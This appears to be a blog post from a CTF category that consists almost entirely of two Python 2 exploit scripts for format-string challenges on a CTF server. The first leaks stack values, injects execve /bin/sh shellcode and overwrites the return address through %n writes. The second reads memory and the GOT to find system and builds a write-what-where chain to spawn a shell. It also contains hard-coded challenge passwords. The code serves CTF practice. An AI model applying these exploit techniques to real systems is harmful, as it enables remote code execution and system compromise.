BFSB1.
from socket import *
import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib
# common stuffs
p = lambda x: struct.pack("<L", x)
pq = lambda x: struct.pack("<Q", x)
ph = lambda x: struct.pack("<H", x)
pb = lambda x: struct.pack("<B", x)
def recv_until(s, pat):
msg = ''
while True:
msg += s.recv(1024)
if msg.find(pat) != -1:
break
return msg
def check(s):
for c in s:
if c not in '1234567890abcdef \n': return False
return True
# pwn
s = socket(AF_INET, SOCK_STREAM)
s.connect( ('leaveret.kr', 10112) )
'''
# stage1
print 'go!'
recv_until(s, 'password or quit? ')
print 'stage1 start!'
for i in xrange(800, 980):
payload = '%{0}$llx'.format(i)
s.send(payload + '\n')
result = s.recv(1024).split('\n')[0]
print '{0} -> {1}'.format(payload, result)
if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]
#payload = '%{0}$s'.format(i)
#s.send(payload + '\n')
#print '{0} -> {1}'.format(payload, s.recv(1024))
'''
recv_until(s, 'password or quit? ')
s.send('LeaveRet_Handsome_Sexy_Pretty_Smart_ZZZZ\n')
# stage2
shellcode = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"
nop = "\x90"
recv_until(s, 'break? ')
print 'stage2 start!'
# put shellcode
s.send(nop*90 + shellcode + '\n')
recv_until(s, 'break? ')
# get stack address
s.send('%196$llx\n')
stack_addr = int(recv_until(s, 'break? ').split('\n')[0], 16)
print 'stack address -{0}-'.format(hex(stack_addr))
# stack offset
RET_OFFSET = 416
SH_OFFSET = 1424
sh_addr = stack_addr - SH_OFFSET
print 'shellcode at -{0}-'.format(hex(sh_addr))
# overwrite 8 byte ret address byte-to-byte
for N in xrange(6):
byte = str(int( ((sh_addr >> (N*8)) & 0xFF) ))
print 'overwrite!' + byte
# write ret address to stack
s.send( 'A'*56 + pq(stack_addr - RET_OFFSET + N) + '\n' )
recv_until(s, 'break? ').split('\n')[0]
# write a value to return address
s.send( '%'+byte+'c%17$n\n' )
recv_until(s, 'break? ').split('\n')[0]
# inspect stack
print 'check STACK!'
'''
for i in xrange(1, 30):
payload = '%{0}$llx'.format(i)
s.send(payload + '\n')
result = recv_until(s, 'break? ').split('\npayload')[0]
print '{0} -> {1}'.format(payload, result)
#if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]
'''
# return to shellcode
s.send('break\n')
# get shell
t = telnetlib.Telnet()
t.sock = s
t.interact()
BFSB2.
from socket import *
import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib
# common stuffs
p = lambda x: struct.pack("<L", x)
pq = lambda x: struct.pack("<Q", x)
ph = lambda x: struct.pack("<H", x)
pb = lambda x: struct.pack("<B", x)
def recv_until(s, pat):
msg = ''
while True:
msg += s.recv(1024)
if msg.find(pat) != -1:
break
return msg
def check(s):
for c in s:
if c not in '1234567890abcdef \n': return False
return True
# pwn
s = socket(AF_INET, SOCK_STREAM)
s.connect( ('leaveret.kr', 10094) )
# stage1
def dump_memory(p_addr):
addr = p_addr
elf = ''
while True:
if pq(addr).find('\n') != -1:
addr += 1
continue
payload = '%21$sBBB' + pq(addr)
s.send(payload + '\n')
result = recv_until(s, 'break? ').split('BBB')[0]
if len(result) < 1:
elf += '\x00'
addr += 1
else:
elf += result
addr += len(result)
print '{0} : {1}'.format(hex(addr), result.encode('hex'))
print elf.encode('hex')
#dump_memory( 0x8048000 ) # dump ELF image to find password.
recv_until(s, 'password or quit? ')
s.send('Have_A_Fun_QUESTIONMARK_Love_FSB_NOT_GirlFrienddd\n')
print recv_until(s, 'break? ')
# stage2
def mem_read(addr):
if pq(addr).find('\n') != -1:
print 'address contains 0a!'
return 0
payload = '%21$sBBB' + pq(addr)
s.send(payload + '\n')
result = int(recv_until(s, 'break? ').split('BBB')[0][:4][::-1].encode('hex'), 16)
print 'mem_read> {0} : {1}'.format(hex(addr), hex(result))
return result
def mem_write(addr, data):
if pq(addr).find('\n') != -1:
print 'address contains 0a!'
return 0
e1 = (data) & 0xFF
e2 = (data>>8) & 0xFF
e3 = (data>>16) & 0xFF
e4 = (data>>24) & 0xFF
if e1 < 10: e1 = e1-5
elif e1 < 100: e1 = e1-4
else: e1 = e1 - 3
if e2 < 10: e2 = e2-5
elif e2 < 100: e2 = e2-4
else: e2 = e2 - 3
if e3 < 10: e3 = e3-5
elif e3 < 100: e3 = e3-4
else: e3 = e3 - 3
if e4 < 10: e4 = e4-5
elif e4 < 100: e4 = e4-4
else: e4 = e4 - 3
print 'writing...'
pad8 = '%{0}c'.format(e1)
pad8 = pad8 + '#'*(8-len(pad8))
payload = pad8 + '%23$nBBB' + pq(addr)
s.send(payload + '\n')
recv_until(s, 'break? ').split('BBB')[0].split('###')[1]
pad8 = '%{0}c'.format(e2)
pad8 = pad8 + '#'*(8-len(pad8))
payload = pad8 + '%23$nBBB' + pq(addr+1)
s.send(payload + '\n')
recv_until(s, 'break? ').split('BBB')[0].split('###')[1]
pad8 = '%{0}c'.format(e3)
pad8 = pad8 + '#'*(8-len(pad8))
payload = pad8 + '%23$nBBB' + pq(addr+2)
s.send(payload + '\n')
recv_until(s, 'break? ').split('BBB')[0].split('###')[1]
pad8 = '%{0}c'.format(e4)
pad8 = pad8 + '#'*(8-len(pad8))
payload = pad8 + '%23$nBBB' + pq(addr+3)
s.send(payload + '\n')
recv_until(s, 'break? ').split('BBB')[0].split('###')[1]
print 'mem_write> {0} : {1}'.format(hex(addr), hex(data))
def mem_leak():
RET_OFFSET = 0x68 # parent stack frame size
payload = '%278$xBBB'
s.send(payload + '\n')
result = int(recv_until(s, 'break? ').split('BBB')[0][:8], 16)
return (result - RET_OFFSET - 4)
# leak got
# libc_start offset :18650
# system offset : 3b160
system = mem_read(0x804b04c) + 0x22B10 #libc_start + 0x22b10 -> system
p_retaddr = mem_leak()
print 'ret addr at {0}'.format(hex(p_retaddr))
print 'system at {0}'.format(hex(system))
# overwrite ret address!
mem_write(p_retaddr, system)
# build rop chain
stack = p_retaddr
mem_write(stack+8, stack+16)
mem_write(stack+16, 0x6e69622f)
mem_write(stack+20, 0x68732f2f)
mem_write(stack+24, 0)
# inspect stack
'''
print 'check STACK!'
for i in xrange(270, 295):
payload = '%{0}$xBBB'.format(i)
s.send(payload + '\n')
result = recv_until(s, 'break? ').split('BBB')[0]
print '{0} -> {1}'.format(payload, result)
if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]
'''
s.send('break\n')
# get shell
t = telnetlib.Telnet()
t.sock = s
t.interact()
'Games > CTF' 카테고리의 다른 글
| MMA CTF 2015 SPELL (0) | 2015.09.08 |
|---|---|
| MMA CTF 2015 RPS (0) | 2015.09.08 |
| GITS 2014 TI-1337 (0) | 2014.12.22 |
| SECCON 2014 Advanced RISC Machine (0) | 2014.12.08 |
| hack.lu callgate writeup (0) | 2014.10.28 |
